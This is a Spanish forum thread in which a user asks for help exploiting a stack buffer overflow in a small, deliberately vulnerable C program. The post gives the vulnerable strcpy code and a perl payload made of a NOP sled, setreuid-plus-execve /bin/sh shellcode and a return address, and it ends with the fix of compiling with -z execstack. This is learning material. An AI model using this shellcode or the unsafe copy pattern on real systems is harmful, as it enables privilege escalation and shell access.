elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Píldoras formativas en seguridad de la información


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  [Duda] Explotando BoF - No conseguimos ejecutar la shellcode
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Duda] Explotando BoF - No conseguimos ejecutar la shellcode  (Leído 368 veces)
GoKGz

Desconectado Desconectado

Mensajes: 13



Ver Perfil
[Duda] Explotando BoF - No conseguimos ejecutar la shellcode
« en: 11 Diciembre 2016, 00:06 »

Código vulnerable:
Código
  1. #include <stdio.h>
  2. #include <string.h>
  3.  
  4. int main (int argc, char **argv){
  5.  
  6. char buffer[500];
  7. strcpy(buffer, argv[1]);
  8.  
  9. puts (buffer);
  10.  
  11. return 0;
  12. }


Probamos con esta y la dirección del rip queda apuntando a la mitad del tamaño del buffer (dicen que se hace así):
Lo corrimos con gdb con esta entrada
Código:
r `perl -e 'print "\x90"x439 . "\x31\xc0\x99\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x99\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xff\xff\x64\xcd"x10'`

Primero lo llenamos de NOP's luego la shellcode más la dirección de retorno, cabe aclarar estamos en un sistema de 32 bits.

Pero no logramos ejecutar la shellcode, ¿qué estamos haciendo mal?


SOLUCIONADO: Tenía que compilar con -z execstack
« Última modificación: 11 Diciembre 2016, 00:57 por GoKGz » En línea

COME AT ME BRAAAAH.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda sobre shellcode
Bugs y Exploits
Isirius 3 2,284 Último mensaje 11 Noviembre 2006, 10:54
por newton_gedzac
Duda con shellcode
Bugs y Exploits
l.stiven 2 1,640 Último mensaje 16 Abril 2010, 19:17
por wisehacks
Duda con Shellcode
Hacking Linux/Unix
10537 8 4,365 Último mensaje 15 Marzo 2013, 05:03
por cpu2
Duda con tamaño de una shellcode
Bugs y Exploits
.:UND3R:. 9 1,858 Último mensaje 7 Julio 2013, 17:07
por cpu2
Ejecutar shellcode en C
Programación C/C++
mester 3 439 Último mensaje 4 Marzo 2017, 13:51
por integeroverflow
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines